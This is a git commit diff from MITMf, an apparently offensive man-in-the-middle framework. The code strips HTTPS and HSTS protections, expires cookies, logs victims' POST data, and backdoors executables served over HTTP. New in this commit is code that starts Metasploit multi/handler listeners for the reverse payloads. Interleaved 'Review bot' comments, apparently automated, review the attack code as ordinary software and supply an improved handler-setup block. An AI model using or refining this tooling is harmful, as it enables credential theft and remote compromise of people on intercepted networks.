- Fixed bug where sometimes DNS wouldn't resolve local IPs

- Added Metasploit integration to Filepwn plugin
This commit is contained in:
byt3bl33d3r 2015-04-15 18:19:19 +02:00
parent 8eb09309d2
commit b91bb4271b
5 changed files with 84 additions and 56 deletions


@ -72,7 +72,7 @@ class ClientRequest(Request):
if 'referer' in headers: if 'referer' in headers:
real = self.urlMonitor.real real = self.urlMonitor.real
if len(real) > 0: if len(real) > 0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, real.keys()))) dregex = re.compile("({})".format("|".join(map(re.escape, real.keys()))))
headers['referer'] = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), headers['referer']) headers['referer'] = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), headers['referer'])
if 'if-none-match' in headers: if 'if-none-match' in headers:
@ -80,13 +80,13 @@ class ClientRequest(Request):
if 'host' in headers: if 'host' in headers:
host = self.urlMonitor.URLgetRealHost(str(headers['host'])) host = self.urlMonitor.URLgetRealHost(str(headers['host']))
mitmf_logger.debug("[ClientRequest][HSTS] Modifing HOST header: %s -> %s" % (headers['host'], host)) mitmf_logger.debug("[ClientRequest][HSTS] Modifing HOST header: {} -> {}".format(headers['host'], host))
headers['host'] = host headers['host'] = host
self.setHeader('Host', host) self.setHeader('Host', host)
if 'accept-encoding' in headers: if 'accept-encoding' in headers:
del headers['accept-encoding'] del headers['accept-encoding']
mitmf_logger.debug("Zapped encoding") mitmf_logger.debug("[ClientRequest] Zapped encoding")
if 'if-modified-since' in headers: if 'if-modified-since' in headers:
del headers['if-modified-since'] del headers['if-modified-since']
@ -117,7 +117,7 @@ class ClientRequest(Request):
return "lock.ico" return "lock.ico"
def handleHostResolvedSuccess(self, address): def handleHostResolvedSuccess(self, address):
mitmf_logger.debug("[ClientRequest] Resolved host successfully: %s -> %s" % (self.getHeader('host'), address)) mitmf_logger.debug("[ClientRequest] Resolved host successfully: {} -> {}".format(self.getHeader('host'), address))
host = self.getHeader("host") host = self.getHeader("host")
headers = self.cleanHeaders() headers = self.cleanHeaders()
client = self.getClientIP() client = self.getClientIP()
@ -138,13 +138,13 @@ class ClientRequest(Request):
url = 'http://' + host + path url = 'http://' + host + path
self.uri = url # set URI to absolute self.uri = url # set URI to absolute
if len(real) > 0: if real:
dregex = re.compile("(%s)" % "|".join(map(re.escape, real.keys()))) dregex = re.compile("({})".format("|".join(map(re.escape, real.keys()))))
path = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), path) path = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), path)
postData = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), postData) postData = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), postData)
if len(patchDict) > 0: if patchDict:
dregex = re.compile("(%s)" % "|".join(map(re.escape, patchDict.keys()))) dregex = re.compile("({})".format("|".join(map(re.escape, patchDict.keys()))))
postData = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), postData) postData = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), postData)
@ -155,22 +155,22 @@ class ClientRequest(Request):
self.dnsCache.cacheResolution(hostparts[0], address) self.dnsCache.cacheResolution(hostparts[0], address)
if (not self.cookieCleaner.isClean(self.method, client, host, headers)): if (not self.cookieCleaner.isClean(self.method, client, host, headers)):
mitmf_logger.debug("Sending expired cookies...") mitmf_logger.debug("[ClientRequest] Sending expired cookies")
self.sendExpiredCookies(host, path, self.cookieCleaner.getExpireHeaders(self.method, client, host, headers, path)) self.sendExpiredCookies(host, path, self.cookieCleaner.getExpireHeaders(self.method, client, host, headers, path))
elif (self.urlMonitor.isSecureFavicon(client, path)): elif (self.urlMonitor.isSecureFavicon(client, path)):
mitmf_logger.debug("Sending spoofed favicon response...") mitmf_logger.debug("[ClientRequest] Sending spoofed favicon response")
self.sendSpoofedFaviconResponse() self.sendSpoofedFaviconResponse()
elif (self.urlMonitor.isSecureLink(client, url) or ('securelink' in headers)): elif (self.urlMonitor.isSecureLink(client, url) or ('securelink' in headers)):
if 'securelink' in headers: if 'securelink' in headers:
del headers['securelink'] del headers['securelink']
mitmf_logger.debug("Sending request via SSL...(%s %s)" % (client,url)) mitmf_logger.debug("[ClientRequest] Sending request via SSL ({})".format((client,url)))
self.proxyViaSSL(address, self.method, path, postData, headers, self.urlMonitor.getSecurePort(client, url)) self.proxyViaSSL(address, self.method, path, postData, headers, self.urlMonitor.getSecurePort(client, url))
else: else:
mitmf_logger.debug("Sending request via HTTP...") mitmf_logger.debug("[ClientRequest] Sending request via HTTP")
#self.proxyViaHTTP(address, self.method, path, postData, headers) #self.proxyViaHTTP(address, self.method, path, postData, headers)
port = 80 port = 80
if len(hostparts) > 1: if len(hostparts) > 1:
@ -189,7 +189,7 @@ class ClientRequest(Request):
address = self.dnsCache.getCachedAddress(host) address = self.dnsCache.getCachedAddress(host)
if address != None: if address != None:
mitmf_logger.debug("[ClientRequest] Host cached: %s %s" % (host, str(address))) mitmf_logger.debug("[ClientRequest] Host cached: {} {}".format(host, str(address)))
return defer.succeed(address) return defer.succeed(address)
else: else:
@ -197,20 +197,22 @@ class ClientRequest(Request):
if self.resolver == 'dnschef': if self.resolver == 'dnschef':
try: try:
mitmf_logger.debug("[ClientRequest] Resolving with DNSChef")
address = str(self.customResolver.query(host)[0].address) address = str(self.customResolver.query(host)[0].address)
return defer.succeed(address) return defer.succeed(address)
except Exception: except Exception:
return defer.fail() mitmf_logger.debug("[ClientRequest] Exception occured, falling back to reactor.resolve()")
return reactor.resolve(host)
elif self.resolver == 'twisted': elif self.resolver == 'twisted':
return reactor.resolve(host) return reactor.resolve(host)
def process(self): def process(self):
mitmf_logger.debug("[ClientRequest] Resolving host: %s" % (self.getHeader('host'))) mitmf_logger.debug("[ClientRequest] Resolving host: {}".format(self.getHeader('host')))
host = self.getHeader('host').split(":")[0] host = self.getHeader('host').split(":")[0]
if self.hsts: if self.hsts:
host = self.urlMonitor.URLgetRealHost("%s"%host) host = self.urlMonitor.URLgetRealHost(str(host))
deferred = self.resolveHost(host) deferred = self.resolveHost(host)
deferred.addCallback(self.handleHostResolvedSuccess) deferred.addCallback(self.handleHostResolvedSuccess)
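Review bot: The new `except Exception:` branch in the dnschef path of resolveHost discards the exception before falling back to `reactor.resolve(host)`, so a DNSChef failure leaves no trace of its cause in the log and the "sometimes doesn't resolve" symptom this commit targets stays hard to diagnose. Bind and log it: `except Exception as e:` followed by `mitmf_logger.debug("[ClientRequest] DNSChef resolution failed ({}), falling back to reactor.resolve()".format(e))`, which also fixes the misspelling "occured" in the new message. The enclosing resolveHost method starts outside the hunk.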


@ -70,18 +70,18 @@ class ServerConnection(HTTPClient):
if self.command == 'GET': if self.command == 'GET':
try: try:
user_agent = parse(self.headers['user-agent']) user_agent = parse(self.headers['user-agent'])
self.clientInfo = "%s [type:%s-%s os:%s] " % (self.client.getClientIP(), user_agent.browser.family, user_agent.browser.version[0], user_agent.os.family) self.clientInfo = "{0} [type:{1}-{2} os:{3}] ".format(self.client.getClientIP(), user_agent.browser.family, user_agent.browser.version[0], user_agent.os.family)
except: except:
self.clientInfo = "%s " % self.client.getClientIP() self.clientInfo = "{} ".format(self.client.getClientIP())
mitmf_logger.info(self.clientInfo + "Sending Request: %s" % self.headers['host']) mitmf_logger.info(self.clientInfo + "Sending Request: {}".format(self.headers['host']))
self.plugins.hook() self.plugins.hook()
self.sendCommand(self.command, self.uri) self.sendCommand(self.command, self.uri)
def sendHeaders(self): def sendHeaders(self):
for header, value in self.headers.iteritems(): for header, value in self.headers.iteritems():
mitmf_logger.debug("Sending header: (%s => %s)" % (header, value)) mitmf_logger.debug("[ServerConnection] Sending header: ({} => {})".format(header, value))
self.sendHeader(header, value) self.sendHeader(header, value)
self.endHeaders() self.endHeaders()
@ -92,11 +92,11 @@ class ServerConnection(HTTPClient):
elif 'keylog' in self.uri: elif 'keylog' in self.uri:
self.plugins.hook() self.plugins.hook()
else: else:
mitmf_logger.warning("%s %s Data (%s):\n%s" % (self.client.getClientIP(), self.getPostPrefix(), self.headers['host'], self.postData)) mitmf_logger.warning("{0} {1} Data ({2}):\n{3}".format(self.client.getClientIP(), self.getPostPrefix(), self.headers['host'], self.postData))
self.transport.write(self.postData) self.transport.write(self.postData)
def connectionMade(self): def connectionMade(self):
mitmf_logger.debug("HTTP connection made.") mitmf_logger.debug("[ServerConnection] HTTP connection made.")
self.plugins.hook() self.plugins.hook()
self.sendRequest() self.sendRequest()
self.sendHeaders() self.sendHeaders()
@ -105,11 +105,11 @@ class ServerConnection(HTTPClient):
self.sendPostData() self.sendPostData()
def handleStatus(self, version, code, message): def handleStatus(self, version, code, message):
mitmf_logger.debug("Got server response: %s %s %s" % (version, code, message)) mitmf_logger.debug("[ServerConnection] Got server response: {0} {1} {2}".format(version, code, message))
self.client.setResponseCode(int(code), message) self.client.setResponseCode(int(code), message)
def handleHeader(self, key, value): def handleHeader(self, key, value):
mitmf_logger.debug("[ServerConnection] Receiving header: (%s => %s)" % (key, value)) mitmf_logger.debug("[ServerConnection] Receiving header ({}: {})".format(key, value))
if (key.lower() == 'location'): if (key.lower() == 'location'):
value = self.replaceSecureLinks(value) value = self.replaceSecureLinks(value)
@ -119,15 +119,15 @@ class ServerConnection(HTTPClient):
if (key.lower() == 'content-type'): if (key.lower() == 'content-type'):
if (value.find('image') != -1): if (value.find('image') != -1):
self.isImageRequest = True self.isImageRequest = True
mitmf_logger.debug("Response is image content, not scanning...") mitmf_logger.debug("[ServerConnection] Response is image content, not scanning...")
if (key.lower() == 'content-encoding'): if (key.lower() == 'content-encoding'):
if (value.find('gzip') != -1): if (value.find('gzip') != -1):
mitmf_logger.debug("Response is compressed...") mitmf_logger.debug("[ServerConnection] Response is compressed...")
self.isCompressed = True self.isCompressed = True
elif (key.lower()== 'strict-transport-security'): elif (key.lower()== 'strict-transport-security'):
mitmf_logger.info("%s Zapped a strict-trasport-security header" % self.client.getClientIP()) mitmf_logger.info("{} Zapped a strict-trasport-security header".format(self.client.getClientIP()))
elif (key.lower() == 'content-length'): elif (key.lower() == 'content-length'):
self.contentLength = value self.contentLength = value
@ -164,10 +164,11 @@ class ServerConnection(HTTPClient):
def handleResponse(self, data): def handleResponse(self, data):
if (self.isCompressed): if (self.isCompressed):
mitmf_logger.debug("Decompressing content...") mitmf_logger.debug("[ServerConnection] Decompressing content...")
data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read() data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read()
#mitmf_logger.debug("Read from server:\n" + data) #mitmf_logger.debug("Read from server:\n" + data)
mitmf_logger.debug("[ServerConnection] Read from server {} bytes of data".format(len(data)))
data = self.replaceSecureLinks(data) data = self.replaceSecureLinks(data)
res = self.plugins.hook() res = self.plugins.hook()
@ -184,7 +185,7 @@ class ServerConnection(HTTPClient):
try: try:
self.shutdown() self.shutdown()
except: except:
mitmf_logger.info("Client connection dropped before request finished.") mitmf_logger.info("[ServerConnection] Client connection dropped before request finished.")
def replaceSecureLinks(self, data): def replaceSecureLinks(self, data):
if self.hsts: if self.hsts:
@ -193,7 +194,7 @@ class ServerConnection(HTTPClient):
patchDict = self.urlMonitor.patchDict patchDict = self.urlMonitor.patchDict
if len(patchDict)>0: if len(patchDict)>0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, patchDict.keys()))) dregex = re.compile("({})".format("|".join(map(re.escape, patchDict.keys()))))
data = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), data) data = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), data)
iterator = re.finditer(ServerConnection.urlExpression, data) iterator = re.finditer(ServerConnection.urlExpression, data)
@ -202,13 +203,13 @@ class ServerConnection(HTTPClient):
mitmf_logger.debug("[ServerConnection] Found secure reference: " + url) mitmf_logger.debug("[ServerConnection] Found secure reference: " + url)
nuevaurl=self.urlMonitor.addSecureLink(self.client.getClientIP(), url) nuevaurl=self.urlMonitor.addSecureLink(self.client.getClientIP(), url)
mitmf_logger.debug("[ServerConnection][HSTS] Replacing %s => %s"%(url,nuevaurl)) mitmf_logger.debug("[ServerConnection][HSTS] Replacing {} => {}".format(url,nuevaurl))
sustitucion[url] = nuevaurl sustitucion[url] = nuevaurl
#data.replace(url,nuevaurl) #data.replace(url,nuevaurl)
#data = self.urlMonitor.DataReemplazo(data) #data = self.urlMonitor.DataReemplazo(data)
if len(sustitucion)>0: if len(sustitucion)>0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, sustitucion.keys()))) dregex = re.compile("({})".format("|".join(map(re.escape, sustitucion.keys()))))
data = dregex.sub(lambda x: str(sustitucion[x.string[x.start() :x.end()]]), data) data = dregex.sub(lambda x: str(sustitucion[x.string[x.start() :x.end()]]), data)
#mitmf_logger.debug("HSTS DEBUG received data:\n"+data) #mitmf_logger.debug("HSTS DEBUG received data:\n"+data)
@ -227,7 +228,7 @@ class ServerConnection(HTTPClient):
for match in iterator: for match in iterator:
url = match.group() url = match.group()
mitmf_logger.debug("Found secure reference: " + url) mitmf_logger.debug("[ServerConnection] Found secure reference: " + url)
url = url.replace('https://', 'http://', 1) url = url.replace('https://', 'http://', 1)
url = url.replace('&', '&') url = url.replace('&', '&')
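Review bot: The rewritten handleHeader log changes its shape to `Receiving header ({}: {})` while the sendHeaders log rewritten in the same commit keeps `Sending header: ({} => {})`, so the two sides of the header trace no longer line up when read together; use one form for both, e.g. `mitmf_logger.debug("[ServerConnection] Receiving header: ({} => {})".format(key, value))`. The strict-transport-security message is also rewritten here but still carries the misspelling `strict-trasport-security`. The handleHeader body continues outside its hunk.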


@ -67,6 +67,7 @@ import multiprocessing
from libs.bdfactory import pebin from libs.bdfactory import pebin
from libs.bdfactory import elfbin from libs.bdfactory import elfbin
from libs.bdfactory import machobin from libs.bdfactory import machobin
from core.msfrpc import Msfrpc
from plugins.plugin import Plugin from plugins.plugin import Plugin
from tempfile import mkstemp from tempfile import mkstemp
from configobj import ConfigObj from configobj import ConfigObj
@ -79,7 +80,7 @@ class FilePwn(Plugin):
desc = "Backdoor executables being sent over http using bdfactory" desc = "Backdoor executables being sent over http using bdfactory"
implements = ["handleResponse"] implements = ["handleResponse"]
tree_output = ["BDFProxy v0.3.2 online"] tree_output = ["BDFProxy v0.3.2 online"]
version = "0.2" version = "0.3"
has_opts = False has_opts = False
def initialize(self, options): def initialize(self, options):
@ -109,6 +110,20 @@ class FilePwn(Plugin):
#NOT USED NOW #NOT USED NOW
#self.supportedBins = ('MZ', '7f454c46'.decode('hex')) #self.supportedBins = ('MZ', '7f454c46'.decode('hex'))
#Metasploit options
msfcfg = options.configfile['MITMf']['Metasploit']
rpcip = msfcfg['rpcip']
rpcpass = msfcfg['rpcpass']
try:
self.msf = Msfrpc({"host": rpcip}) #create an instance of msfrpc libarary
self.msf.login('msf', rpcpass)
version = self.msf.call('core.version')['version']
self.tree_output.append("Connected to Metasploit v%s" % version)
except Exception:
sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server")
#FilePwn options
self.userConfig = options.configfile['FilePwn'] self.userConfig = options.configfile['FilePwn']
self.FileSizeMax = self.userConfig['targets']['ALL']['FileSizeMax'] self.FileSizeMax = self.userConfig['targets']['ALL']['FileSizeMax']
self.WindowsIntelx86 = self.userConfig['targets']['ALL']['WindowsIntelx86'] self.WindowsIntelx86 = self.userConfig['targets']['ALL']['WindowsIntelx86']
@ -123,6 +138,32 @@ class FilePwn(Plugin):
self.zipblacklist = self.userConfig['ZIP']['blacklist'] self.zipblacklist = self.userConfig['ZIP']['blacklist']
self.tarblacklist = self.userConfig['TAR']['blacklist'] self.tarblacklist = self.userConfig['TAR']['blacklist']
self.tree_output.append("Setting up Metasploit payload handlers")
jobs = self.msf.call('job.list')
for config in [self.LinuxIntelx86, self.LinuxIntelx64, self.WindowsIntelx86, self.WindowsIntelx64, self.MachoIntelx86, self.MachoIntelx64]:
cmd = "use exploit/multi/handler\n"
cmd += "set payload {}\n".format(config["MSFPAYLOAD"])
cmd += "set LHOST {}\n".format(config["HOST"])
cmd += "set LPORT {}\n".format(config["PORT"])
cmd += "exploit -j\n"
if jobs:
for pid, name in jobs.iteritems():
info = self.msf.call('job.info', [pid])
if (info['name'] != "Exploit: multi/handler") or (info['datastore']['payload'] != config["MSFPAYLOAD"]) or (info['datastore']['LPORT'] != config["PORT"]) or (info['datastore']['lhost'] != config['HOST']):
#Create a virtual console
c_id = self.msf.call('console.create')['id']
#write the cmd to the newly created console
self.msf.call('console.write', [c_id, cmd])
else:
#Create a virtual console
c_id = self.msf.call('console.create')['id']
#write the cmd to the newly created console
self.msf.call('console.write', [c_id, cmd])
def convert_to_Bool(self, aString): def convert_to_Bool(self, aString):
if aString.lower() == 'true': if aString.lower() == 'true':
return True return True
@ -300,7 +341,7 @@ class FilePwn(Plugin):
except Exception as e: except Exception as e:
print 'Exception', str(e) print 'Exception', str(e)
mitmf_logger.warning("EXCEPTION IN binaryGrinder %s", str(e)) mitmf_logger.warning("EXCEPTION IN binaryGrinder {}".format(e))
return None return None
def tar_files(self, aTarFileBytes, formatt): def tar_files(self, aTarFileBytes, formatt):
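Review bot: The job check in the new handler-setup loop of FilePwn.initialize fires per existing job rather than per config: every job in `job.list` that is not a matching multi/handler creates a console and writes the command, so one unrelated job yields a duplicate handler for each config, and a matching handler does not suppress the duplicates the other jobs trigger. Decide with one flag per config — scan the jobs for a match, then create the console once only when none was found — which also removes the copied console.create/console.write pair in the else branch; note the datastore values are compared with `!=` against config strings, so a numeric `LPORT` in the job info would never match (depends on what msfrpc returns, unverified here). The consoles created this way are never destroyed, and the commit removes the JavaPwn `finish()` that called `console.destroy`, so an equivalent `finish()` on FilePwn is worth adding. The `except Exception:` around the login discards the error before `sys.exit`; `except Exception as e:` with `e` included in the exit message would help diagnosis. `initialize` begins in the earlier hunk of this section.
```python
        self.tree_output.append("Setting up Metasploit payload handlers")
        jobs = self.msf.call('job.list')
        for config in [self.LinuxIntelx86, self.LinuxIntelx64, self.WindowsIntelx86, self.WindowsIntelx64, self.MachoIntelx86, self.MachoIntelx64]:
            # … unchanged: cmd assembly …
            handler_running = False
            for pid in (jobs or {}):
                info = self.msf.call('job.info', [pid])
                if (info['name'] == "Exploit: multi/handler") and (info['datastore']['payload'] == config["MSFPAYLOAD"]) and (info['datastore']['LPORT'] == config["PORT"]) and (info['datastore']['lhost'] == config['HOST']):
                    handler_running = True
                    break
            if not handler_running:
                #Create one virtual console per config and write the cmd to it
                c_id = self.msf.call('console.create')['id']
                self.msf.call('console.write', [c_id, cmd])
```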


@ -18,13 +18,13 @@
# USA # USA
# #
import core.msfrpc as msfrpc
import string import string
import random import random
import threading import threading
import sys import sys
import logging import logging
from core.msfrpc import Msfrpc
from plugins.plugin import Plugin from plugins.plugin import Plugin
from plugins.BrowserProfiler import BrowserProfiler from plugins.BrowserProfiler import BrowserProfiler
from time import sleep from time import sleep
@ -71,7 +71,7 @@ class JavaPwn(BrowserProfiler, Plugin):
self.black_ips = [] self.black_ips = []
try: try:
msf = msfrpc.Msfrpc({"host": self.rpcip}) #create an instance of msfrpc libarary msf = Msfrpc({"host": self.rpcip}) #create an instance of msfrpc libarary
msf.login('msf', self.rpcpass) msf.login('msf', self.rpcpass)
version = msf.call('core.version')['version'] version = msf.call('core.version')['version']
self.tree_output.append("Connected to Metasploit v%s" % version) self.tree_output.append("Connected to Metasploit v%s" % version)
@ -233,20 +233,3 @@ class JavaPwn(BrowserProfiler, Plugin):
self.send_command(cmd, msf, vic_ip) self.send_command(cmd, msf, vic_ip)
self.injectWait(msf, rand_url, vic_ip) self.injectWait(msf, rand_url, vic_ip)
sleep(1) sleep(1)
def finish(self):
'''This will be called when shutting down'''
msf = msfrpc.Msfrpc({"host": self.rpcip})
msf.login('msf', self.rpcpass)
jobs = msf.call('job.list')
if len(jobs) > 0:
print '\n[*] Stopping all running metasploit jobs'
for k, v in jobs.iteritems():
msf.call('job.stop', [k])
consoles = msf.call('console.list')['consoles']
if len(consoles) > 0:
print "[*] Closing all virtual consoles"
for console in consoles:
msf.call('console.destroy', [console['id']])


@ -10,3 +10,4 @@ pyyaml
ua-parser ua-parser
Pillow Pillow
pefile pefile
pypcap